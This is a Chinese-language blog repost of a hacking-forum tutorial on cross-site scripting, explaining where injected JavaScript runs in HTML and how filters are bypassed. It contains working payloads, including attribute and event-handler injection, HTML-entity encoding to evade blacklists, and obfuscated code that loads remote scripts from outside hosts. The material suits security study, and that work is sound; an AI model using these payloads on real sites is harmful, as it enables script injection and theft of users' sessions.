正在阅读:

前端安全:know it then hack it

7,560

法客论坛的ack总结的关于web前端黑客中XSS的利用,很实用的技术。详细的介绍了XSS可以执行的地方,对我们学习前端安全及XSS攻击很有帮助,希望大家好好学习。

XSS绕过

一、html可以执行javascript的地方有哪些?

先举个例子 比如这个代码

<a href="$a">f4ck</a>

变量$a可控,怎么让这个代码弹框(执行javascript代码)呢?

(1)属性值引入javascript:[code]伪协议。来执行javascript代码。也就是$a=javascript:alert(1)只有引用文件的属性才能触发javascript脚本,这些标签有:


href
action
bgsound
background
value
dynsrc
lowsrc
<form action="javascript:alert(1)">
<input type="text" name="name" value="">
<input type="submit" value="提交">
</form>
<img src="javascript:alert('1');" />

由于这些属性值不是通用属性,所以会在不同的标签中,如果在火狐上测试不成功请在ie下测试,我用ie6测试是成功的。

(2)"闭合前一个属性值,引入事件驱动属性。事件驱动属性的值是javascript代码,所以可以执行javascript。事件驱动属性是标签的通用属性,所以所有标签都可以用。也就是

$a= " onclick=alert(1)

这样的事件驱动属性标签还有:


ondblclick
onmousedown
onmouseup
onmouseover
onmousemove
onmouseout
onmousepress
onmousedown
onmouseup
<a href="" onclick=alert(1) >f4ck</a>

(3)闭合标签,引入<script></scirpt>标签来执行javascript代码。也就是:

$a="><script>alert(1)</script>

(4)CSS可以通过expression属性执行javascript代码

expression是ie独有的css属性,其目的是为了插入一段javascript代码。

<p style="xss:expression(alert(1))">

在ie6下执行成功。

@import "http://www.waitalone.cn/xss.css";

可以从外部导入存在xss代码的css样式。

如果css属性可控,除了可以在expression后面添加javascript代码执行外,还可以像(2)(3)一样通过闭合标签和属性值来达到执行javascript的目的。

乌云上的案例: CSS未过滤导致XSS

综上,可以在html里执行javascript的地方有


1、利用 javascript:在属性值里

2、事件驱动属性

3、<script></script>标签中(包括这种形式<script src=" http://www.waitalone.cn/1.js"></script>)

4、CSS中的expression属性中(仅IE)。

二、为什么编码后的代码仍然可以执行?

(1)上面的$a是没被过滤的,但假如被过滤了怎么办,假如只是黑名单过滤了javascript,或者只是对$a进行了htmlspecialchars()转换。 执行javascript的地方只进行了html编码。

<a href="$a">f4ck</a>

$a的 值

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

$a的值

j&#97;v&#97;s&#99;ript&#58;&#97;lert&#40;&#49;&#41;

$a的值:

javascript:alert(1)

以上为html的三种编码。提交后,可以绕过黑名单javascript,进行htmlspecialchars()编码是不会发生任何变化的,那么,这段代码为什么会执行?
因为这个代码,浏览器从头解析当解析到,$a的值时,正常将它解码,就变成 javascript:alert(1),然后这个代码在href属性中,所以就执行了。

三、怎么远程加载外部js?

先来说说html标记,html标记其实可以分为两种

1、文本用闭合标签。

例:

<h1>f4ck</h1>

2、引用内容用自闭合标签。

例:

<img src="http://www.waitalone.cn/img/bdlogo.gif" />

浏览器会在html页面加载时,额外向服务器发送请求,注:这里是html标签的特性,不要和同源策略相混淆,同源策略是用来限制浏览器的。

加载进来的js和本域是同源的。

哪些标签可以远程加载外部js,并执行呢?

<script src="www.waitalone.cn/1.js"> </script>

<iframe src="www.waitalone.cn/1.js"></iframe>

<iframe src=javascript:with(document)0[body.appendChild(document.createElement('script')).src="http://url.cn/1.js"]></iframe>

其实3就是dom的方法创建和插入节点。

var s=document.createElement("script");
s.src="http://www.waitalone.cn/xss.js";
document.getElementsByTagName("head")[0].appendChild(s);

直接用3用于

<img src='#' onerror=“var a = document.getElementsByTagName('head').item(0);
var b = document.createElement(String.fromCharCode(115,99,114,105,112,116));
b.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);
b.src=‘hook.js';
a.appendChild(b);">

后记:后面写的有点乱,可能有错误的,欢迎提出。

原文地址:

http://sb.f4ck.org/thread-14663-1-1.html

http://www.waitalone.cn/7497.html

目前有:2条访客评论,博主回复1

  1. creek
    2013-12-18 00:19

    楼主你的博客太强大了:)

  2. weisange
    2016-11-14 11:33

    我看了一个遍,感觉确实挺强大的内容,楼主继续分享!

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌